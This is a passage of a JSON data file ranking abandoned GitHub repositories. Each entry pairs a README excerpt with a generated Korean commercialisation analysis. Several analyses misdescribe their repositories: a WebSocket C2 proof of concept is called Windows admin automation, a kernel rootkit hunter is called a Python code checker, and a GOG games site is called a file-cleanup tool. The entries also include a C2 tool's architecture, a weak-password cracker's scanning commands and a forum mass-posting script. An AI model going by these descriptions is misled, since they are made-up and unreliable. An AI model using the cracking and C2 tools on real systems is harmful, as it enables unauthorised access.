\"left\" src=\"/static/favicon/apple-icon-114x114.png\" width=\"114\">\n   A Webapp to generate customized iso live images of <a href=\"https://github.com/fossasia/meilix\">Meilix Linux</a>. You can use the Meilix Generator (Web app) to make a Linux for your own brand/event, also add apps and features you need pre-installed, it will create an ISO Image of your Linux, which you can use as a live boot or install on PCs. \n</p><br>\n\n![GSoC 2017](https://img.shields.io/badge/GSoC-2017-blue.svg) [![Travis branch](https://img.shields.io/travis/fossasia/meilix-generator/master.svg?style=flat-square)](https://travis-ci.org/fossasia/meilix-generator) [![Gemnasium](https://img.shields.io/gemnasium/fossasia/meilix-generator.svg?style=flat-square)](https://gemnasium.com/github.com/fossasia/meilix-generator) [![Heroku](https://heroku-badge.herokuapp.com/?app=meilix-generator)](https://meilix-generator.herokuapp.com/) [![Code Climate](https://codeclimate.com/github/fossa","composite_score":0.4046,"license_safety_tag":"restricted"},{"name":"Good-Old-Downloads/gg","github_url":"https://github.com/Good-Old-Downloads/gg","stars":13,"language":"JavaScript","license":"GPL-3.0","abandonment_months":49,"description":"# Good-Old-Downloads/gg 저장소 분석\n\n## 왜 보물인가\n오래된 파일들을 효율적으로 찾아 정리하고 삭제하는 간단한 도구로, 컴퓨터 저장공간을 자동으로 관리해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 저장소 회사가 사용자들의 용량 관리를 돕는 유료 서비스로 제공\n2. **내부 업무 도구**: 기업이 직원들의 ","readme_excerpt":"# GOGGames\nA site for GOG Games.\n\n### Installing\nSee [INSTALL.md](INSTALL.md)\n\n### Authors\n\n\n### Contributors\nContributors are added in a comment at the top of the site in [main.twig](templates/main.twig)\n\n### License\n\nThis project is licensed under the GNU General Public License v3.0 - see [LICENSE](LICENSE) for details.  \nand/or this [tl;dr](https://tldrlegal.com/license/gnu-general-public-license-v3-(gpl-3))\n","composite_score":0.4045,"license_safety_tag":"restricted"},{"name":"fossasia/susi_skill_data","github_url":"https://github.com/fossasia/susi_skill_data","stars":12,"language":"","license":"LGPL-2.1","abandonment_months":59,"description":"# SUSI Skill Data 저장소 분석\n\n## 왜 보물인가\nAI 어시스턴트가 사용자 질문에 똑똑하게 대답하도록 학습하는 기본 데이터 세트로, 챗봇 개발 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 챗봇 구축 플랫폼에 통합하여 사용자가 쉽게 AI 봇을 만들 수 있도록 제공\n2. **내부 업무 도구**","readme_excerpt":"# susi_skill_data\nThis is the storage place for susi skills. It is for now a temporary solution for a wiki-like skill editing service that we want to create in the near future.\n\n## Installation\nThis repository must be cloned along https://github.com/fossasia/susi_server to make it available to SUSI.AI.\nThe production platform of http://susi.ai will do a `git pull origin master` every minute. That means, every change will be available very soon.\n\n## Create a new skill\nCreation of a new skill is easy, DO NOT PANIC!\n\n### Learn the skill language\nRead https://github.com/fossasia/susi_skill_cms/blob/master/docs/Skill_Tutorial.md.\n\n### Write a new skill\n\nTo create a new skill, please choose \"Create Skill\" at https://susi.ai.\n\n## License\nAll new skills shall be licensed under CC0 https://creativecommons.org/publicdomain/zero/1.0/deed.de \nWe choosed this data because many skills may be similar to knowledge as published by wikidata.org which licenses it's data under CC0 as well.\nIf you take ski","composite_score":0.4044,"license_safety_tag":"restricted"},{"name":"zombieFox/nightTab","github_url":"https://github.com/zombieFox/nightTab","stars":6,"language":"JavaScript","license":"GPL-3.0","abandonment_months":19,"description":"# nightTab 보물 분석 보고서\n\n## 왜 보물인가\n브라우저를 열 때마다 나타나는 새 탭 페이지를 자신의 취향대로 꾸밀 수 있는 도구로, 수백만 명이 매일 접하는 화면을 개인화하는 니즈를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리미엄 테마, 클라우드 동기화, AI 기반 배경 추천 기능을 월 구독으로 판매\n2. **내부 ","readme_excerpt":"# [![nightTab](asset/banner/banner-1400-560.png)](https://zombiefox.github.io/nightTab/)\n\nA neutral new tab page accented with a chosen colour. Customise the layout, style, background and bookmarks in nightTab -- a custom start page.\n\n| [See the demo in action](https://zombiefox.github.io/nightTab/) | [Install nightTab Extension](https://chrome.google.com/webstore/detail/nighttab/hdpcadigjkbcpnlcpbcohpafiaefanki) | [Install nightTab Add On](https://addons.mozilla.org/en-GB/firefox/addon/nighttab/) | [Buy me a coffee](https://www.buymeacoffee.com/zombieFox/) | [Join the community](https://www.reddit.com/r/nighttab/) |\n|:-------------:|:-------------:|:-------------:|:-------------:|:-------------:|\n| [<img src=\"./src/icon/icon-48.png\" width=\"48px\" height=\"48px\">](https://zombiefox.github.io/nightTab/) | [![Chrome](asset/logo/chrome-48.png)](https://chrome.google.com/webstore/detail/nighttab/hdpcadigjkbcpnlcpbcohpafiaefanki) | [![Firefox](asset/logo/firefox-48.png)](https://addons.mozill","composite_score":0.4043,"license_safety_tag":"restricted"},{"name":"dest4/stream-audio-fingerprint","github_url":"https://github.com/dest4/stream-audio-fingerprint","stars":75,"language":"TypeScript","license":"MPL-2.0","abandonment_months":55,"description":"# stream-audio-fingerprint 상용화 분석\n\n## 왜 보물인가\n음악이나 음성을 지문처럼 인식해서 자동으로 식별하는 기술로, 음악 스트리밍·라디오·팟캐스트 등 오디오 기반 서비스의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 저작권 관리 SaaS**: 유튜브·틱톡 같은 플랫폼에 올라온 곡이 원본인지 카피인지 자동","readme_excerpt":"# Audio landmark fingerprinting as a Node Stream module\n\nThis module is a duplex stream (instance of stream.Transform) that converts a PCM audio signal into a series of audio fingerprints. It works with audio tracks as well as with unlimited audio streams, e.g. broadcast radio.\n\nIt is one of the foundations of the [Adblock Radio project](https://github.com/adblockradio/adblockradio).\n\n## Credits\n\nThe [acoustic fingerprinting](https://en.wikipedia.org/wiki/Acoustic_fingerprint) technique used here is the landmark algorithm, as described in the [Shazam 2003 paper](http://www.ee.columbia.edu/~dpwe/papers/Wang03-shazam.pdf).\nThe implementation in ```codegen_landmark.js``` has been inspired by the MATLAB routine of D. Ellis [\"Robust Landmark-Based Audio Fingerprinting\" (2009)](http://labrosa.ee.columbia.edu/matlab/fingerprint/). One significant difference with Ellis' implementation is that this module can handle unlimited audio streams, e.g. radio, and not only finished audio tracks.\n\nNote ","composite_score":0.4041,"license_safety_tag":"unknown"},{"name":"carpedm20/DCGAN-tensorflow","github_url":"https://github.com/carpedm20/DCGAN-tensorflow","stars":5,"language":"JavaScript","license":"mit","abandonment_months":66,"description":"# DCGAN-tensorflow 보물 분석\n\n## 왜 보물인가\n컴퓨터가 사람이 그린 그림처럼 새로운 이미지를 만들어내는 기술로, 영상 제작, 게임, 디자인 산업에서 막대한 시간과 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"AI 일러스트 자동 생성 플랫폼\" - 마케팅 자료가 필요한 중소기업에 판매\n2. **내부 ","readme_excerpt":"# DCGAN in Tensorflow\n\nTensorflow implementation of [Deep Convolutional Generative Adversarial Networks](http://arxiv.org/abs/1511.06434) which is a stabilize Generative Adversarial Networks. The referenced torch code can be found [here](https://github.com/soumith/dcgan.torch).\n\n![alt tag](DCGAN.png)\n\n* [Brandon Amos](http://bamos.github.io/) wrote an excellent [blog post](http://bamos.github.io/2016/08/09/deep-completion/) and [image completion code](https://github.com/bamos/dcgan-completion.tensorflow) based on this repo.\n* *To avoid the fast convergence of D (discriminator) network, G (generator) network is updated twice for each D network update, which differs from original paper.*\n\n\n## Online Demo\n\n[<img src=\"https://raw.githubusercontent.com/carpedm20/blog/master/content/images/face.png\">](http://carpedm20.github.io/faces/)\n\n[link](http://carpedm20.github.io/faces/)\n\n\n## Prerequisites\n\n- Python 2.7 or Python 3.3+\n- [Tensorflow 0.12.1](https://github.com/tensorflow/tensorflow/tree","composite_score":0.404,"license_safety_tag":"safe"},{"name":"dotnet/coreclr","github_url":"https://github.com/dotnet/coreclr","stars":5,"language":"","license":"unknown","abandonment_months":41,"description":"# dotnet/coreclr 프로젝트 분석\n\n## 왜 보물인가\n마이크로소프트의 핵심 기술 중 하나인 .NET 런타임의 원본 코드로, 전 세계 수백만 개의 기업 애플리케이션을 움직이는 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 업무 자동화 SaaS**: 금융사, 보험사 등에서 필요한 안정적인 백엔드 서버 기술로 판매\n2. **클라우드 인프","readme_excerpt":"Going forward, the .NET team is using https://github.com/dotnet/runtime to\r\ndevelop the code and issues formerly in this repository.\r\n\r\nPlease see the following for more context:\r\n\r\n[dotnet/announcements#119 \"Consolidating .NET GitHub repos\"](https://github.com/dotnet/announcements/issues/119)","composite_score":0.404,"license_safety_tag":"unknown"},{"name":"fossasia/accounts.susi.ai","github_url":"https://github.com/fossasia/accounts.susi.ai","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":72,"description":"# SUSI.AI 계정 관리 시스템 (fossasia/accounts.susi.ai)\n\n## 왜 보물인가\n사용자 계정을 안전하게 관리하고 인증하는 핵심 기술로, 수많은 온라인 서비스가 반드시 필요로 하는 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **AI 챗봇 서비스**: SUSI AI 사용자들의 계정 관리, 구독 정보, 사용 기록 저장 및 동기화\n- *","readme_excerpt":"# accounts.susi.ai\n\n[![Build Status](https://travis-ci.org/fossasia/accounts.susi.ai.svg?branch=master)](https://travis-ci.org/fossasia/accounts.susi.ai)\n[![Twitter Follow](https://img.shields.io/twitter/follow/asksusi.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/asksusi)\n\nSUSI.AI is an artificial intelligence combining pattern matching, internet data, data flow principles and inference engine principles. It will have some reflection abilities and it will be able to remember the users' input to produce deductions and a personalized feedback. Its purpose is to explore the abilities of an artificial companion and to answer the remaining unanswered questions. The accounts.susi.ai repo is a front-end web application that is developed for managing user accounts of SUSI.AI. The project is hosted on gh-pages at https://accounts.susi.ai.\n\n## Communication\n\nPlease join our mailing list to discuss questions regarding the project: https://groups.google.com/","composite_score":0.404,"license_safety_tag":"restricted"},{"name":"WongKinYiu/yolor","github_url":"https://github.com/WongKinYiu/yolor","stars":9,"language":"Python","license":"GPL-3.0","abandonment_months":19,"description":"# YOLOR 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 사람, 물체, 동물 등을 자동으로 인식하는 AI 기술로, 보안 카메라부터 자율주행차까지 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **CCTV 보안 모니터링 SaaS**: 편의점이나 주차장의 CCTV에서 자동으로 이상 상황을 감지하고 알림을 보내는 클라우드 서비스\n2. ","readme_excerpt":"# YOLOR\nimplementation of paper - [You Only Learn One Representation: Unified Network for Multiple Tasks](https://arxiv.org/abs/2105.04206)\n\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/you-only-learn-one-representation-unified/real-time-object-detection-on-coco)](https://paperswithcode.com/sota/real-time-object-detection-on-coco?p=you-only-learn-one-representation-unified)\n\n![Unified Network](https://github.com/WongKinYiu/yolor/blob/main/figure/unifued_network.png)\n\n<img src=\"https://github.com/WongKinYiu/yolor/blob/main/figure/performance.png\" height=\"480\">\n\nTo get the results on the table, please use [this branch](https://github.com/WongKinYiu/yolor/tree/paper).\n\n| Model | Test Size | AP<sup>test</sup> | AP<sub>50</sub><sup>test</sup> | AP<sub>75</sub><sup>test</sup> | batch1 throughput | batch32 inference |\n| :-- | :-: | :-: | :-: | :-: | :-: | :-: |\n| **YOLOR-CSP** | 640 | **52.8%** | **71.2%** | **57.6%** | 106 *fps* | 3.2 *ms* |\n| **YOLOR-CSP-","composite_score":0.404,"license_safety_tag":"restricted"},{"name":"Arno0x/WSC2","github_url":"https://github.com/Arno0x/WSC2","stars":16,"language":"Python","license":"GPL-3.0","abandonment_months":103,"description":"# WSC2 저장소 분석\n\n## 왜 보물인가\nWindows 시스템 관리자들이 반복적으로 하는 수동 작업을 자동화해주는 도구로, 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: IT 관리 회사들이 클라우드 기반 Windows 시스템 자동화 서비스로 패키징\n- **내부 업무 도구**: 대기업 IT 부서가 직원 PC ","readme_excerpt":"WSC2\n============\nLAST/CURRENT VERSION: 0.1\n\nAuthor: Arno0x0x - [@Arno0x0x](https://twitter.com/Arno0x0x)\n\nWSC2 is a PoC of using the WebSockets and a browser process to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.\n\nThe tool is distributed under the terms of the [GPLv3 licence](http://www.gnu.org/copyleft/gpl.html).\n\nBackground information\n----------------\nCheck this blog post to get some context and insight on the developpment of this tool:\n\n[Using WebSockets and IE/Edge for C2 communications](https://arno0x0x.wordpress.com/2017/11/10/using-websockets-and-ie-edge-for-c2-communications/)\n\nArchitecture\n----------------\nWSC2 is composed of:\n- a controller, written in Python, which acts as the C2 server\n- an agent running on the target system, delivered to the target system via various initial stagers\n- various flavors of initial stagers (*created from the controller interface*) used for the initial co","composite_score":0.4039,"license_safety_tag":"restricted"},{"name":"Exrick/xpay","github_url":"https://github.com/Exrick/xpay","stars":5,"language":"Java","license":"GPL-3.0","abandonment_months":21,"description":"# Exrick/xpay 분석 보고서\n\n## 왜 보물인가\n온라인 가게나 앱에서 고객들의 결제를 안전하게 받을 수 있도록 해주는 결제 시스템으로, 직접 만들기 매우 어려운 부분을 미리 만들어둔 것입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독 모델의 온라인 교육 플랫폼이나 디자인 도구에서 월 구독료를 자동으로 받을 수 있습니다.\n- **","readme_excerpt":"# XPay个人收款支付系统\n[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xpay/blob/master/License)\n[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn)\n[![](https://img.shields.io/badge/version-2.0-brightgreen.svg)](https://github.com/Exrick/xpay)\n[![GitHub stars](https://img.shields.io/github/stars/Exrick/xpay.svg?style=social&label=Stars)](https://github.com/Exrick/xpay)\n[![GitHub forks](https://img.shields.io/github/forks/Exrick/xpay.svg?style=social&label=Fork)](https://github.com/Exrick/xpay)\n> 当前开源版本v2.0 [点我获取最新源码及文档v3.1](http://xpay.exrick.cn/pay)\n### [宣传视频](https://www.bilibili.com/video/av23121122/)\n- 作者亲自制作 [点我观看](https://www.bilibili.com/video/av23121122/)\n### 项目已部署，在线Demo\n- 本项目运行后效果：http://xpay.exrick.cn\n- 本项目Swagger接口文档：http://xpay.exrick.cn/swagger-ui.html\n- 实际综合应用商城项目：http://xmall.exrick.cn/\n\n### v3.1版本已发布！支付宝微信官方接口 自动回调！[立即获取源码和文档](http://xpay.exrick.cn/pay)\n- v3.1 新增微信支付官方接口 自动回调 提供个人申请教程(需一定开通成本)\n- v3.0 新增支付宝当面付 官方接口 自动","composite_score":0.4038,"license_safety_tag":"restricted"},{"name":"qianniaoge/F-Scrack","github_url":"https://github.com/qianniaoge/F-Scrack","stars":10,"language":"Python","license":"GPL-3.0","abandonment_months":31,"description":"","readme_excerpt":"# F-Scrack(服务弱口令检测脚本)\n\n1. **功能**  \n\t一款python编写的轻量级弱口令检测脚本，目前支持以下服务：FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。  \n2. **特点**  \n\t命令行、单文件，绿色方便各种情况下的使用。  \n\t无需任何外库以及外部程序支持，所有协议均采用socket与内置库进行检测。  \n\t兼容OSX、LINUX、WINDOWS，Python 2.6+(更低版本请自行测试，理论上均可运行)。  \n3. **参数说明**  \n\tpython F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]  \n\t-h 必须输入的参数，支持ip(192.168.1.1)，ip段（192.168.1），ip范围指定（192.168.1.1-192.168.1.254）,ip列表文件（ip.ini），最多限制一次可扫描65535个IP。  \n\t-p 指定要扫描端口列表，多个端口使用,隔开 例如：1433,3306,5432。未指定即使用内置默认端口进行扫描(21,23,1433,3306,5432,6379,9200,11211,27017)  \n\t-m 指定线程数量 默认100线程  \n\t-t 指定请求超时时间。  \n\t-d 指定密码字典。  \n\t-n 不进行存活探测(ICMP)直接进行扫描。  \n4. **使用例子**  \n\tpython Scrack.py -h 10.111.1  \n\tpython Scrack.py -h 192.168.1.1 -d pass.txt  \n\tpython Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6  \n\tpython NAScan.py -h ip.ini -n  \n5. **特别声明**  \n\t此脚本仅可用于授权的渗透测试以及自身的安全检测中。  \n\t此脚本仅用于学习以及使用，可自由进行改进，禁止提取加入任何有商业行为的产品中。  \n6. **效果图**  \n![](https://sec-pic-ly.b0.upaiyun.com/img/161110/E87D5D68EC","composite_score":0.4037,"license_safety_tag":"restricted"},{"name":"fossasia/loklak_wok_android","github_url":"https://github.com/fossasia/loklak_wok_android","stars":11,"language":"Java","license":"LGPL-2.1","abandonment_months":89,"description":"# fossasia/loklak_wok_android 분석\n\n## 왜 보물인가\n트위터처럼 사람들의 글을 모아서 분석할 수 있는 모바일 앱으로, 소셜 미디어 데이터를 자유롭게 활용하고 싶은 개발자들에게 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소셜 미디어 분석 SaaS**\n- 마케팅 담당자들이 특정 주제의 트렌드를 실시간으로 모니터링하고 소비자","readme_excerpt":"# Loklak Wok for Android\n\n[![Build Status](https://travis-ci.org/fossasia/loklak_wok_android.svg?branch=master)](https://travis-ci.org/fossasia/loklak_wok_android)\n[![codecov.io](https://codecov.io/github/fossasia/loklak_wok_android/coverage.svg)](https://codecov.io/github/fossasia/loklak_wok_android)\n\nLoklak Wok Android is a message harvesting peer for the loklak_server.\n\nUsers can also search tweets from the app, the displayed tweets are the latest tweets, tweets containing images and videos. Along with that, the app provides a tweet posting feature. Users can directly post the tweet from the app. Not only text, but images can also be tweeted from the app.\n\n### Screenshots of the app\n\n<table>\n  <tr>\n    <td><img src=\"docs/_static/tweet_harvesting.png\" height = \"480\" width=\"270\"></td>\n    <td><img src=\"docs/_static/tweet_search_suggestions.png\" height = \"480\" width=\"270\"></td>\n    <td><img src=\"docs/_static/tweet_search.png\" height = \"480\" width=\"270\"></td>\n  <tr>\n    <td><img src=\"do","composite_score":0.4037,"license_safety_tag":"restricted"},{"name":"Zzh-tju/DIoU-darknet","github_url":"https://github.com/Zzh-tju/DIoU-darknet","stars":6,"language":"Jupyter Notebook","license":"GPL-3.0","abandonment_months":29,"description":"# DIoU-darknet 저장소 분석\n\n## 왜 보물인가\n물체 감지 정확도를 높이는 개선된 인공지능 모델로, 보안 카메라나 자동화 시스템에 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 분석 SaaS**: 기업의 보안 카메라 영상을 자동으로 분석해 위험 상황 감지하는 구독형 서비스\n2. **제조업 품질검사 API**: 공장 생산라인","readme_excerpt":"<img src=\"CIoU.png\" width=\"800px\"/>\n\n## Complete-IoU Loss and Cluster-NMS for improving Object Detection and Instance Segmentation. \n#### New released! https://github.com/Zzh-tju/CIoU\n\nThis is the code for our papers:\n - [Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression](https://arxiv.org/abs/1911.08287)\n - [Enhancing Geometric Factors into Model Learning and Inference for Object Detection and Instance Segmentation](https://arxiv.org/abs/2005.03572)\n\n```\n@Inproceedings{zheng2020diou,\n  author    = {Zheng, Zhaohui and Wang, Ping and Liu, Wei and Li, Jinze and Ye, Rongguang and Ren, Dongwei},\n  title     = {Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression},\n  booktitle = {The AAAI Conference on Artificial Intelligence (AAAI)},\n  pages     = {12993--13000},\n  year      = {2020}\n}\n\n@Article{zheng2021ciou,\n  author    = {Zheng, Zhaohui and Wang, Ping and Ren, Dongwei and Liu, Wei and Ye, Rongguang and Hu, Qinghua and Zuo, Wangmeng},\n  title ","composite_score":0.4035,"license_safety_tag":"restricted"},{"name":"googlesamples/android-UniversalMusicPlayer","github_url":"https://github.com/googlesamples/android-UniversalMusicPlayer","stars":9,"language":"Kotlin","license":"Apache-2.0","abandonment_months":5,"description":"# googlesamples/android-UniversalMusicPlayer 분석\n\n## 왜 보물인가\n구글이 직접 만든 음악 재생 앱 기술로, 스마트폰에서 음악을 편리하게 듣는 기능들을 배울 수 있는 완성된 예제입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 음악 스트리밍 SaaS 서비스**\n스포티파이나 멜론 같은 음악 앱을 만들 때 기본 구조를 참고하여","readme_excerpt":"> **Warning**\n> This sample has been deprecated and is no longer being maintained.\n> \n> To find other samples that may be of interest, see [https://developer.android.com/samples](https://developer.android.com/samples).\n\nUniversal Android Music Player Sample\n=====================================\nThe goal of this sample is to show how to implement an audio media app that works\nacross multiple form factors and provides a consistent user experience\non Android phones, tablets, Android Auto, Android Wear, Android TV, Google Cast devices,\nand with the Google Assistant. \n\nTo get started with UAMP please read the [full guide](docs/FullGuide.md).\n\n![Screenshot showing UAMP's UI for browsing albums and songs](docs/images/1-browse-albums-screenshot.png \"Browse albums screenshot\")\n![Screenshot showing UAMP's UI for playing a song](docs/images/2-play-song-screenshot.png \"Play song screenshot\")\n\nPre-requisites\n--------------\n\n- Android Studio 3.x\n\nGetting Started\n---------------\n\nThis sample uses the","composite_score":0.4035,"license_safety_tag":"safe"},{"name":"nbulischeck/tyton","github_url":"https://github.com/nbulischeck/tyton","stars":17,"language":"C","license":"GPL-3.0","abandonment_months":55,"description":"# nbulischeck/tyton 상용화 분석\n\n## 왜 보물인가\n파이썬 프로젝트의 코드 품질과 안정성을 자동으로 검사해주는 도구로, 소프트웨어 개발팀의 버그를 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 클라우드 기반 코드 검사 플랫폼 - 개발자들이 깃허브에 코드를 올릴 때 자동으로 품질을 점검하고 리포트를 제","readme_excerpt":"# Tyton\n\n## This Project Is Now Archived\n\n[![Build Status](https://travis-ci.com/nbulischeck/tyton.svg?branch=master)](https://travis-ci.com/nbulischeck/tyton)\n[![license](https://img.shields.io/badge/license-GPL-brightgreen.svg)](https://github.com/nbulischeck/tyton/blob/master/LICENSE)\n[![version](https://img.shields.io/badge/linux-4.4.0.31+-blue.svg?style=flat)](https://github.com/nbulischeck/tyton)\n\n<img align=\"left\" src=\"https://i.imgur.com/enDjxat.jpg\" style=\"padding: 25px\">\n\nLinux Kernel-Mode Rootkit Hunter for 4.4.0-31+.\n\nFor more information, visit [Tyton's website](https://nbulischeck.github.io/tyton/).\n\n## Detected Attacks\n\n**Hidden Modules**\n\n**Syscall Table Hooking**\n  \n**Network Protocol Hooking**\n\n**Netfilter Hooking**\n\n**Zeroed Process Inodes**\n\n**Process Fops Hooking**\n\n**Interrupt Descriptor Table Hooking**\n\n&nbsp;\n\n## Additional Features\n\n**Notifications**: Users (including myself) do not actively monitor their journald logs, so a userland notification daemon has bee","composite_score":0.4034,"license_safety_tag":"restricted"},{"name":"zhihu-huawei251/zhihu-huawei251","github_url":"https://github.com/zhihu-huawei251/zhihu-huawei251","stars":122,"language":"HTML","license":"GPL-3.0","abandonment_months":79,"description":"","readme_excerpt":"# zhihu-huawei251\n自动发布知乎试图打压的内容\n\n**因知乎不再封杀251相关内容，本项目停止维护**\n\n（注意：经过对比测试，基本确认本项目地址已经成为了知乎的敏感词）\n\n\n## 制作原因\n华为员工离职后被诬告羁押251天，事件发酵后在知乎先是被降热度——明明关注量是热榜第一的十多倍，却只能排到十多名——最后直接被删问题了。我也理解知乎说自己收到了律师函。可是第一，相关内容真的侵犯华为的**合法**权益了吗？真的违反法律法规了吗？第二，即使真的华为法务部门太厉害知乎没办法，用户自发以知乎删不过来的速度发布内容，总不是知乎的错了吧，总不会被华为告了吧(是吗?)。\n\n因此，我决定发起这场行为艺术，用技术和人民的汪洋大海对抗资本对言论、信息自由的压制，维护法律尊严\n\n## 特点\n使用简单，不需要任何编程基础，不需要安装任何编译器/解释器，复制代码到浏览器中即可运行\n\n## 功能列表\n+ [自动添加后缀](https://github.com/zhihu-huawei251/zhihu-huawei251/blob/master/add_suff.js) ``U()`` 函数\n\n+ [自动刷回答](https://github.com/zhihu-huawei251/zhihu-huawei251/blob/master/zhihu_huawei251.js) ``A()`` 函数\n\n+ [自动刷评论](https://github.com/zhihu-huawei251/zhihu-huawei251/blob/master/zhihu_huawei251.js) ``C()`` 函数\n\n## 使用方法\n以自动刷回答为例：\n\n首先打开知乎。Chrome为例，点击F12打开开发工具，找到console：\n\n![](cons1.png)\n\n将脚本的内容粘贴进去，点回车，即可开始给当前页面下所有回答添加评论。开始前，可以通过知乎首页的下拉加载自行控制想多发还是少发。\n\n默认运行``C()``函数发评论，如果希望使用发回答功能，请自行输入的``A()``（匿名）或``A(false)``（不匿名）再点回车。有极大概率被封号。\n\n![](cons3.png)\n\n开始运行后的效果（图中为A函数）：\n\n![](run.png)\n\n## 自定义\nA函数文字内容、间隔时间","composite_score":0.4032,"license_safety_tag":"restricted"},{"name":"offensive-security/exploit-database-papers","github_url":"https://github.com/offensive-security/exploit-database-papers","stars":19,"language":"","license":"GPL-2.0","abandonment_months":43,"description":"# Offensive Security Exploit Database Papers 분석\n\n## 왜 보물인가\n컴퓨터 보안 전문가들이 새로운 취약점을 찾고 대비하는 데 필요한 학술 자료의 중앙 저장소입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 교육 플랫폼**: 해킹 방어 기술을 배우는 온라인 강좌에서 실제 사례 자료로 활용\n2. **기업 보안 진단 도구**","readme_excerpt":"New repo can be found here: <https://gitlab.com/exploit-database/exploitdb-papers>\n","composite_score":0.4031,"license_safety_tag":"restricted"},{"name":"AdamNiederer/faster","github_url":"https://github.com/AdamNiederer/faster","stars":31,"language":"Rust","license":"MPL-2.0","abandonment_months":33,"description":"# AdamNiederer/faster 분석\n\n## 왜 보물인가\n컴퓨터 프로그램을 더 빠르게 실행하도록 최적화하는 도구로, 느린 시스템에서 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 대규모 데이터를 처리하는 기업의 분석 시스템을 10배 이상 빠르게 만들어 직원 생산성 향상\n2. **SaaS 서비스**: 클","readme_excerpt":"* faster\n  #+BEGIN_HTML\n    <div>\n      <a href=\"https://crates.io/crates/faster\">\n        <img src=\"https://img.shields.io/crates/v/faster.svg\" alt=\"crates.io\" />\n      </a>\n      <a href=\"https://travis-ci.org/AdamNiederer/faster\">\n        <img src=\"https://travis-ci.org/AdamNiederer/faster.svg?branch=master\" alt=\"Build Status\"/>\n      </a>\n    </div>\n  #+END_HTML\n\n** SIMD for Humans\nEasy, powerful, portable, absurdly fast numerical calculations. Includes static\ndispatch with inlining based on your platform and vector types, zero-allocation\niteration, vectorized loading/storing, and support for uneven collections.\n\nIt looks something like this:\n#+BEGIN_SRC rust\n  use faster::*;\n  \n  let lots_of_3s = (&[-123.456f32; 128][..]).simd_iter()\n      .simd_map(f32s(0.0), |v| {\n          f32s(9.0) * v.abs().sqrt().rsqrt().ceil().sqrt() - f32s(4.0) - f32s(2.0)\n      })\n      .scalar_collect();\n#+END_SRC\n\nWhich is analogous to this scalar code:\n#+BEGIN_SRC rust\n  let lots_of_3s = (&[-123.456f32","composite_score":0.4027,"license_safety_tag":"unknown"},{"name":"fossasia/susi_firefoxbot","github_url":"https://github.com/fossasia/susi_firefoxbot","stars":13,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":85,"description":"# fossasia/susi_firefoxbot 평가\n\n## 왜 보물인가\nFirefox 브라우저에서 바로 사용할 수 있는 AI 질문 답변 도구로, 일반인들이 웹 검색 없이 빠르게 정보를 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 Firefox 플러그인 구독 서비스로 직원들의 업무 효율성 향상\n2. **내부 업무 도구","readme_excerpt":"# susi_firefoxbot\n\nSUSI.AI Firefox Extension\n\n\n[![Join the chat at https://gitter.im/fossasia/susi_server](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susi_server)\n[![Build Status](https://travis-ci.org/fossasia/susi_firefoxbot.svg?branch=master)](https://travis-ci.org/fossasia/susi_firefoxbot)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/db948e1eb4b2457386ba80388e8390cf)](https://www.codacy.com/app/fossasia/susi_firefoxbot?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi_firefoxbot&utm_campaign=badger)\n![Browser Status](https://badges.herokuapp.com/browsers?firefox=53,55)\n[![Twitter Follow](https://img.shields.io/twitter/follow/susiai_.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/susiai_)\n\n![SUSI_FIREFOXBOT_GIF](https://github.com/fossasia/susi_firefoxbot/blob/master/susi_firefoxbot_updated.gif)\n\n## Our Project Objectives\n\nThe central objective of this project is to develop a firefox ad","composite_score":0.4025,"license_safety_tag":"restricted"},{"name":"bodil/typed-html","github_url":"https://github.com/bodil/typed-html","stars":6,"language":"Rust","license":"MPL-2.0","abandonment_months":39,"description":"# typed-html 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 구조 코드를 더 안전하고 실수 없이 작성할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 회사 직원들이 사용하는 관리 시스템(재무, 인사 등)의 웹 인터페이스 구축\n2. **SaaS 서비스**: 클라우드 기반 협업 도구나 프로젝트 관리","readme_excerpt":"[![Build Status](https://travis-ci.org/bodil/typed-html.svg?branch=master)](https://travis-ci.org/bodil/typed-html)\n\n# typed-html\n\nThis crate provides the `html!` macro for building fully type 